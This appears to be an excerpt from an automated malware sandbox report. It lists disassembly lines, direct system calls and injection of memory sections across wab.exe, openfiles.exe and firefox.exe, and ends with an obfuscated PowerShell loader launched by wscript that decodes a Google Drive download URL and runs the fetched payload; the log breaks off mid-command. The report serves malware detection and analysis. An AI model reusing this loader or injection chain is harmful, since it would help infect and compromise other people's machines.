Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202444B0 mov ecx, dword ptr fs:[00000030h] 12_2_202444B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029A4B0 mov eax, dword ptr fs:[00000030h] 12_2_2029A4B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B480 mov eax, dword ptr fs:[00000030h] 12_2_2020B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20219486 mov eax, dword ptr fs:[00000030h] 12_2_20219486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20219486 mov eax, dword ptr fs:[00000030h] 12_2_20219486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202104E5 mov ecx, dword ptr fs:[00000030h] 12_2_202104E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B94E0 mov eax, dword ptr fs:[00000030h] 12_2_202B94E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E54DB mov eax, dword ptr fs:[00000030h] 12_2_202E54DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB52F mov eax, dword ptr fs:[00000030h] 12_2_202CB52F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D530 mov eax, dword ptr fs:[00000030h] 12_2_2024D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D530 mov eax, dword ptr fs:[00000030h] 12_2_2024D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5537 mov eax, dword ptr fs:[00000030h] 12_2_202E5537
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247505 mov eax, dword ptr fs:[00000030h] 12_2_20247505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247505 mov ecx, dword ptr fs:[00000030h] 12_2_20247505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B562 mov eax, dword ptr fs:[00000030h] 12_2_2020B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024656A mov eax, dword ptr fs:[00000030h] 12_2_2024656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024656A mov eax, dword ptr fs:[00000030h] 12_2_2024656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024656A mov eax, dword ptr fs:[00000030h] 12_2_2024656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024B570 mov eax, dword ptr fs:[00000030h] 12_2_2024B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024B570 mov eax, dword ptr fs:[00000030h] 12_2_2024B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20218550 mov eax, dword ptr fs:[00000030h] 12_2_20218550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20218550 mov eax, dword ptr fs:[00000030h] 12_2_20218550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h] 12_2_202905A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h] 12_2_202905A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h] 12_2_202905A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF5BE mov eax, dword ptr fs:[00000030h] 12_2_202CF5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202345B1 mov eax, dword ptr fs:[00000030h] 12_2_202345B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202345B1 mov eax, dword ptr fs:[00000030h] 12_2_202345B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212582 mov eax, dword ptr fs:[00000030h] 12_2_20212582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212582 mov ecx, dword ptr fs:[00000030h] 12_2_20212582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20244588 mov eax, dword ptr fs:[00000030h] 12_2_20244588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020758F mov eax, dword ptr fs:[00000030h] 12_2_2020758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020758F mov eax, dword ptr fs:[00000030h] 12_2_2020758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020758F mov eax, dword ptr fs:[00000030h] 12_2_2020758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E59C mov eax, dword ptr fs:[00000030h] 12_2_2024E59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029B594 mov eax, dword ptr fs:[00000030h] 12_2_2029B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029B594 mov eax, dword ptr fs:[00000030h] 12_2_2029B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202125E0 mov eax, dword ptr fs:[00000030h] 12_2_202125E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024C5ED mov eax, dword ptr fs:[00000030h] 12_2_2024C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024C5ED mov eax, dword ptr fs:[00000030h] 12_2_2024C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202455C0 mov eax, dword ptr fs:[00000030h] 12_2_202455C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E55C9 mov eax, dword ptr fs:[00000030h] 12_2_202E55C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E5CF mov eax, dword ptr fs:[00000030h] 12_2_2024E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E5CF mov eax, dword ptr fs:[00000030h] 12_2_2024E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202165D0 mov eax, dword ptr fs:[00000030h] 12_2_202165D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A5D0 mov eax, dword ptr fs:[00000030h] 12_2_2024A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A5D0 mov eax, dword ptr fs:[00000030h] 12_2_2024A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D5D0 mov eax, dword ptr fs:[00000030h] 12_2_2028D5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D5D0 mov ecx, dword ptr fs:[00000030h] 12_2_2028D5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h] 12_2_202E35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h] 12_2_202E35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E35D7 mov eax, dword ptr fs:[00000030h] 12_2_202E35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202395DA mov eax, dword ptr fs:[00000030h] 12_2_202395DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20246620 mov eax, dword ptr fs:[00000030h] 12_2_20246620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248620 mov eax, dword ptr fs:[00000030h] 12_2_20248620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E627 mov eax, dword ptr fs:[00000030h] 12_2_2022E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F626 mov eax, dword ptr fs:[00000030h] 12_2_2020F626

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenKeyEx: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryValueKey: Direct from: 0x77542BEC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtReadVirtualMemory: Direct from: 0x77542E8C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateKey: Direct from: 0x77542C6C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenKeyEx: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateUserProcess: Direct from: 0x7754371C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtResumeThread: Direct from: 0x77542FBC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtWriteVirtualMemory: Direct from: 0x7754490C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtDelayExecution: Direct from: 0x77542DDC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtReadFile: Direct from: 0x77542ADC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtMapViewOfSection: Direct from: 0x77542D1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and write
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: read write
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\openfiles.exe Thread register set: target process: 4944
Source: C:\Windows\SysWOW64\openfiles.exe Thread APC queued: target process: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A00000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 270F958
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
